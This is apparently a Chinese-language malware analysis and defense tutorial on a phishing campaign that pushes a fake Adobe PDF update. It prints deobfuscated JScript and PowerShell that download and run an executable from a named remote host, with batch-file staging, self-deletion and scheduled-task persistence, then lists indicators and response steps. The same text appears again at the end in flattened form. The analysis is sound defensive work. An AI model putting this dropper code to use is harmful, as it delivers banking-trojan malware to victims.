“围观”一个有趣的钓鱼样本
字数 937 2025-08-18 11:37:19

钓鱼攻击样本分析与防御教学文档

一、钓鱼攻击概述

钓鱼攻击是一种通过伪装成可信来源(如电子邮件、网站或文件)来诱骗受害者泄露敏感信息或执行恶意代码的攻击方式。本案例展示了一个精心设计的钓鱼攻击链,结合了多种技术手段。

二、攻击流程分析

1. 初始感染媒介

  • 攻击载体:钓鱼邮件
  • 诱饵内容:伪装成PDF文件的链接
  • 社会工程技巧:邮件正文包含未使用的密码,增加可信度

2. 恶意网站交互

  • 初始页面:模拟空白PDF文件
  • 触发机制:利用JavaScript监听滚动事件
window.onscroll = function (e) { 
    // 触发恶意代码
}

3. 恶意载荷投放

  • 伪装:显示虚假的"Adobe PDF插件更新"提示
  • 文件名:Adobe-PDF-Install.js(实际是恶意JavaScript)

三、恶意代码分析

1. 代码混淆技术

攻击者使用了多层混淆技术:

  • 字符串分割和重组
  • 数组索引引用
  • 动态函数构造
  • 随机字符插入

2. 核心恶意功能

经过反混淆处理后,核心代码执行以下操作:

var fso = new ActiveXObject("Scripting.FileSystemObject");
var temp = fso.GetSpecialFolder(2); // 获取临时文件夹
var script = "PowerShell \"function Ebfu8([String] $mcudvlsla) { (New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'" + temp + "\\noqnwutj.exe');Start-Process '" + temp + "\\noqnwutj.exe';} try{Ebfu8('http://coinicos.io/images/logo.bin')}catch{Ebfu8('http://coinicos.io/images/logo.bin')}\"";
var nameBat = "sdjkfh";
var pathBat = temp + "\\" + nameBat + ".bat";
var outFile = fso.CreateTextFile(pathBat, true);
outFile.WriteLine(script);
outFile.Close();
var shell = new ActiveXObject("WScript.Shell");
shell.run(pathBat, 0);
fso.DeleteFile(WSH.ScriptFullName); // 删除自身

3. PowerShell载荷

生成的批处理文件包含以下PowerShell命令:

function Ebfu8([String] $mcudvlsla) {
    (New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'C:\DOCUME~1\Xavier\LOCALS~1\Temp\noqnwutj.exe');
    Start-Process 'C:\DOCUME~1\Xavier\LOCALS~1\Temp\noqnwutj.exe';
}
try {
    Ebfu8('http://coinicos.io/images/logo.bin')
} catch {
    Ebfu8('http://coinicos.io/images/logo.bin')
}

四、攻击链完整分析

  1. 电子邮件 → 2. JavaScript → 3. PowerShell → 4. 批处理文件 → 5. 计划任务持久化

持久化机制

  • 将自身复制到:%APPDATA%\Roaming\wsxmail\lloydt.exe
  • 创建计划任务:"MsTools"

五、恶意软件分析

  • 家族:Trickbot
  • VT评分:19/66(检测率)
  • 主要功能:银行木马,具有窃取加密货币能力

六、防御措施

1. 用户教育

  • 警惕不明来源的邮件附件和链接
  • 验证所有软件更新的真实性
  • 不随意启用ActiveX或宏功能

2. 技术防护

- 启用电子邮件过滤和沙箱检测
- 限制PowerShell执行策略
- 监控计划任务创建行为
- 实施应用程序白名单
- 禁用不必要的ActiveX控件

3. 检测指标

  • 域名:coinicos.io
  • 文件路径
    • %TEMP%\noqnwutj.exe
    • %APPDATA%\Roaming\wsxmail\lloydt.exe
  • 计划任务名:MsTools

七、事件响应建议

  1. 隔离受感染主机
  2. 检查计划任务列表
  3. 审查临时文件夹和AppData目录
  4. 收集并分析相关日志
  5. 重置可能泄露的凭证

八、参考资源

  1. VirusTotal分析
  2. 计划任务持久化技术
  3. Trickbot分析报告
钓鱼攻击样本分析与防御教学文档 一、钓鱼攻击概述 钓鱼攻击是一种通过伪装成可信来源(如电子邮件、网站或文件)来诱骗受害者泄露敏感信息或执行恶意代码的攻击方式。本案例展示了一个精心设计的钓鱼攻击链,结合了多种技术手段。 二、攻击流程分析 1. 初始感染媒介 攻击载体 :钓鱼邮件 诱饵内容 :伪装成PDF文件的链接 社会工程技巧 :邮件正文包含未使用的密码,增加可信度 2. 恶意网站交互 初始页面 :模拟空白PDF文件 触发机制 :利用JavaScript监听滚动事件 3. 恶意载荷投放 伪装 :显示虚假的"Adobe PDF插件更新"提示 文件名 :Adobe-PDF-Install.js(实际是恶意JavaScript) 三、恶意代码分析 1. 代码混淆技术 攻击者使用了多层混淆技术: 字符串分割和重组 数组索引引用 动态函数构造 随机字符插入 2. 核心恶意功能 经过反混淆处理后,核心代码执行以下操作: 3. PowerShell载荷 生成的批处理文件包含以下PowerShell命令: 四、攻击链完整分析 电子邮件 → 2. JavaScript → 3. PowerShell → 4. 批处理文件 → 5. 计划任务持久化 持久化机制 将自身复制到: %APPDATA%\Roaming\wsxmail\lloydt.exe 创建计划任务:"MsTools" 五、恶意软件分析 家族 :Trickbot VT评分 :19/66(检测率) 主要功能 :银行木马,具有窃取加密货币能力 六、防御措施 1. 用户教育 警惕不明来源的邮件附件和链接 验证所有软件更新的真实性 不随意启用ActiveX或宏功能 2. 技术防护 3. 检测指标 域名 :coinicos.io 文件路径 : %TEMP%\noqnwutj.exe %APPDATA%\Roaming\wsxmail\lloydt.exe 计划任务名 :MsTools 七、事件响应建议 隔离受感染主机 检查计划任务列表 审查临时文件夹和AppData目录 收集并分析相关日志 重置可能泄露的凭证 八、参考资源 VirusTotal分析 计划任务持久化技术 Trickbot分析报告